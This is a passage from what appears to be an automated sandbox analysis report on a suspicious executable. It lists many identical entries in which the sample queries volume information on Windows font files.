                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
